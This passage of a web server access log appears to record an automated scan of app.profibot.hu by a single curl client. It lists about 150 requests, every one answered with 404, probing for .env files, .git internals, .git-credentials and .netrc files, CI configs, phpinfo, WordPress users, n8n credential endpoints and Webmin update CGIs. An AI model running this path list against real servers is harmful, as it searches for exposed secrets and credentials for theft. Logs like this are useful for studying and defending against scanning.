+0000] - 404 404 - GET http app.profibot.hu "/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.env.example" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/backend/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/api/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/laravel/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/HEAD" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/index" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/logs/HEAD" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/logs/refs/heads/master" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/logs/refs/heads/main" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/logs/refs/remotes/origin/master" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/logs/refs/remotes/origin/main" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/hooks" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/info/exclude" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/refs/heads/master" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/refs/heads/main" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/refs/remotes/origin/HEAD" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/packed-refs" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/objects" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/COMMIT_EDITMSG" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/description" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/FETCH_HEAD" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.git/ORIG_HEAD" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/workflows" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/workflows/main.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/workflows/ci.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/dependabot.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/CODEOWNERS" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/ISSUE_TEMPLATE" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/PULL_REQUEST_TEMPLATE.md" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/funding.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/.github/stale.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitlab-ci.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitlab" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitlab/issue_templates" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitlab/merge_request_templates" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitlab-ci" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitignore" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitattributes" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.gitmodules" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git-credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git-askpass.sh" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git-secret" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/hooks/pre-commit" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/hooks/post-commit" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/info" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/objects/info" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/objects/pack" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/config.bak" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/config.old" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/config~" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/.git/" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/root/.git-credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/root/.gitconfig" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/root/.netrc" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/home/*/.git-credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/home/*/.gitconfig" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/home/*/.netrc" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/~/.git-credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/~/.gitconfig" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/~/.netrc" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/app/.git/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.git/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/wp-content/plugins/" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/wp-json/wp/v2/users" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/wp-content/debug.log" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:30 +0000] - 404 404 - GET http app.profibot.hu "/_profiler/phpinfo" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/phpinfo.php" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/etc/apache2/apache2.conf" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/*.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/software/*.cgi?*u=*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/*?*update*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/webhook/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/webhook-test/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/form/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/form-test/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/webhook" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/form" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/oauth1-credential/auth" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/oauth2-credential/auth" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/workflows" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/executions" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/workflows/run" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/api/v1/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/api/v1/workflows" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/api/v1/executions" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/api/v1/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/__debug" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/.well-known/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/healthz" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/metrics" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/settings" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/login" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/logout" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/users" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/node-types" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/credentials-for-node" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/credential-translation" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/tags" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/variables" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/rest/license" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:31 +0000] - 404 404 - GET http app.profibot.hu "/webhook-waiting/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/chat/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/chat" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/*update.cgi*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/sysinfo.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/proc/index.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/servers/link.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/servers/save.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/apt.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/yum.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/save.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/refresh.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/perform.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/download.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/install.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/update.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/index.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/software/update.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/software/install-updates.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/package-updates/" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/webmin/package-updates/update.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/_next/data/*/index.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/_next/data/*/about.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/_next/data/*/*.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/_next/static/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/api/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/api/auth/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/api/users/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/api/data/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/api/webhook/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/__nextjs_action" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/__nextjs_action/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/app/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/dashboard/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/admin/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/user/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:32 +0000] - 404 404 - GET http app.profibot.hu "/profile/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/settings/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/[slug]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/[id]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/[...catchAll]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/[[...optional]]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/about" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 